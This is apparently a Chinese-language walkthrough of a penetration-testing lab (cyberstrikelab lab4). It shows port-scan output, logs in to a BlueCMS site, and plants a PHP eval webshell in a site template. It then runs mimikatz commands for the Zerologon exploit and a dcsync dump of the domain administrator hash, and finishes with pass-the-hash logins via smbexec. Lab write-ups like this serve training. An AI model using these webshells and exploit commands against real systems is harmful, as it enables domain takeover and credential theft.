cyberstrikelab-lab4

Oceanzbz

2025-03-25

攻防渗透

信息收集

还是老样子看fscan的扫描记录,同时对比一下qscan(速度快)扫描看看哪个更详细


   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.10.10   is alive
(icmp) Target 192.168.10.233  is alive
[*] Icmp alive hosts len is: 2
192.168.10.10:135 open
192.168.10.10:139 open
192.168.10.233:22 open
192.168.10.10:445 open
192.168.10.10:3306 open
192.168.10.10:3389 open
192.168.10.10:5040 open
192.168.10.10:5820 open
192.168.10.10:7680 open
192.168.10.233:8080 open
192.168.10.233:11333 open
192.168.10.10:49664 open
192.168.10.10:49665 open
192.168.10.10:49667 open
192.168.10.10:49666 open
192.168.10.10:49668 open
192.168.10.10:49669 open
192.168.10.10:49670 open
[*] alive ports len is: 18
start vulscan
[*] WebTitle http://192.168.10.233:11333 code:404 len:19     title:None
[*] WebTitle http://192.168.10.10:5820 code:200 len:9243   title:演示网站 - Powered by BlueCMS
[*] WebTitle https://192.168.10.233:8080 code:404 len:19     title:None
[+] InfoScan http://192.168.10.10:5820 [CMS] 
已完成 16/18 [-] (47/210) rdp 192.168.10.10:3389 administrator abc123 remote error: tls: access denied 
已完成 16/18 [-] (94/210) rdp 192.168.10.10:3389 admin admin@111 remote error: tls: access denied 
已完成 16/18 [-] (141/210) rdp 192.168.10.10:3389 guest 123456 remote error: tls: access denied 
已完成 16/18 [-] ssh 192.168.10.233:22 admin 123456789 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 
已完成 17/18 [-] ssh 192.168.10.233:22 admin qwe123!@# ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 
已完成 18/18

./qscan_mac_arm64 -t 192.168.10.1/24 -p 1-65535
        
	┏┓┏┏┏┓┏┓
	┗┫┛┗┗┻┛┗
	 ┗      
Tips: 可以使用--spy 10，将会进行10.0.0.1/8(A段)进行网关存活性探测
[+]2025/03/25 15:46:13 当前环境为：darwin, 输出编码为：utf-8
[+]2025/03/25 15:46:13 成功加载HTTP指纹:[24758]条
[+]2025/03/25 15:46:13 成功加载NMAP探针:[150]个,指纹[11916]条
[+]2025/03/25 15:46:14 Domain、IP、Port、URL、Hydra引擎已准备就绪
netbios://192.168.10.10:139    netbios                    Port:139,OperatingSystem:Windows,Digest:"\x83\x00\x00\x01\x8f",Length:5,ProductName:osoftWindowsnetbios-ss
smb://192.168.10.10:445        smb                        Port:445,Digest:"SMB@A*VAC/$@`<+00,0+7+7,Length:518
mysql://192.168.10.10:3306     mysql                      ProductName:MySQL,Port:3306,Digest:"HjHost'192.168.122.124,Info:unauthorized,DeviceType:cpe:,Length:76
rdp://192.168.10.10:3389       rdp                        Port:3389,ProductName:crosoftTerminalService,OperatingSystem:Windows,Digest:0e\xd0\x00\x00\x124\x00\,Length:19
ssh://192.168.10.233:22        ssh                        Version:7.4,Port:22,Digest:"SSH-2.0-OpenSSH_7.4\r\n,Length:21,ProductName:OpenSSH,Info:protocol2.0
[+]2025/03/25 15:46:33 所有扫描任务已下发完毕
http://192.168.10.10:5820      演示网站-PoweredbyBlueCMS  FingerPrint:PHP;QQ;Apache;PasswordField;ActiveX;Object;JQuery;Adobe-Flash;Apachehttpd/2.4.39;Apachehttpd;v;(Win64)OpenSSL/1.1.1bmod_fcgid/2.3.9amod_log_rotate/1.02,Port:5820,Digest:"演示网站您好欢迎您的访问登录免费注册设为首页加,Length:9513,FoundDomain:w.w3.org、fpdownload.macr
http://192.168.10.233:8080                                Port:8080,Digest:"tanHTTPrequesttoan,Length:76
http://192.168.10.233:11333                               Length:176,Port:11333,FingerPrint:cpe:;Go-IPFSjson-rpcorInfluxDBAPI,Digest:"\r\n\r\n404pagenotfo
[+]2025/03/25 15:47:18 程序执行总时长为：[1m4.940741125s]

可以看到qscan的扫描很快，还有对应的指纹信息描述，fscan相对慢一点，但是好像端口多一点。
不管了先来看看这个web服务

是一个Bluecms去找找一下漏洞，发现存在sql注入试试,但是这里我用之前第二个靶机的密码试进去了。

bluecms1.6 sql注入 + 后台getshell

具体利用参考 https://github.com/DeeLMind/penetration-1/blob/master/0day%20%26%20exp/BLUECMS/blueCMS%20v1.6%20sp1%20ad_js.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.txt

解密也能得到密码admin123456

然后找到个模版改一下加个后门。

添加后门

1	<?php @eval($_POST['a']);?>

然后直接拿到flag

内网渗透

拿fscan扫描一波内网吧

192.168.20.30:445 open
192.168.20.20:445 open
192.168.20.10:445 open
192.168.20.30:139 open
192.168.20.20:139 open
192.168.20.10:139 open
192.168.20.30:135 open
192.168.20.20:135 open
192.168.20.10:135 open
192.168.20.10:7680 open
192.168.20.30:88 open
192.168.20.20:7001 open
192.168.20.10:3306 open
[*] NetInfo 
[*]192.168.20.20
   [->]cyberweb
   [->]192.168.20.20
[*] NetBios 192.168.20.20   cyberweb.cyberstrikelab.com         Windows Server 2012 R2 Standard 9600
[*] WebTitle http://192.168.20.20:7001 code:404 len:1164   title:Error 404--Not Found
[+] InfoScan http://192.168.20.20:7001 [weblogic] 
[*] NetInfo 
[*]192.168.20.20
   [->]cyberweb
   [->]192.168.20.20
[*] NetBios 192.168.20.20   cyberweb.cyberstrikelab.com         Windows Server 2012 R2 Standard 9600
[*] WebTitle http://192.168.20.10:5820 code:200 len:9243   title:演示网站 - Powered by BlueCMS
[+] InfoScan http://192.168.20.10:5820 [CMS] 
[*] WebTitle http://192.168.20.30:47001 code:404 len:315    title:Not Found
[*] WebTitle http://192.168.20.20:47001 code:404 len:315    title:Not Found
[*] WebTitle http://192.168.20.20:5985 code:404 len:315    title:Not Found
[*] WebTitle http://192.168.20.20:7001 code:404 len:1164   title:Error 404--Not Found
[+] InfoScan http://192.168.20.20:7001 [weblogic] 
[+] PocScan http://192.168.20.20:7001 poc-yaml-weblogic-cve-2020-14750

扫描出来一个weblogic 的漏洞，但是他妹的没啥叼用好像，只能进个后台。先弹到cs打打域控试试，还是先试试lab3打的zerologon

zerologon

可以看到之前的fscan的扫描记录并没扫出来30这个主机的主机名，那么就手动看看

ping -a 192.168.20.30

1	shell mimikatz.exe "lsadump::zerologon /target:192.168.20.30 /account:WIN-7NRTJO59O7N$ "exit"

发现存在这个漏洞，去滞空一下

1	shell mimikatz.exe "lsadump::zerologon /target:192.168.20.30 /ntlm /null /account:WIN-7NRTJO59O7N$ /exploit" "exit"

滞空成功，导出域管理员的hash

1	shell mimikatz.exe "lsadump::dcsync /csv /domain:cyberstrikelab.com /dc:WIN-7NRTJO59O7N.cyberstrikelab.com /user:administrator /authuser:WIN-7NRTJO59O7N$ /authpassword:\"\" /authntlm" "exit"

直接打pth就行了。

proxychains4 python3 smbexec.py -hashes :00f995cbe63fd30411f44d434b8dac98 cyberstrikelab.com/administrator@192.168.20.30


proxychains4 python3 smbexec.py -hashes :00f995cbe63fd30411f44d434b8dac98 cyberstrikelab.com/administrator@192.168.20.20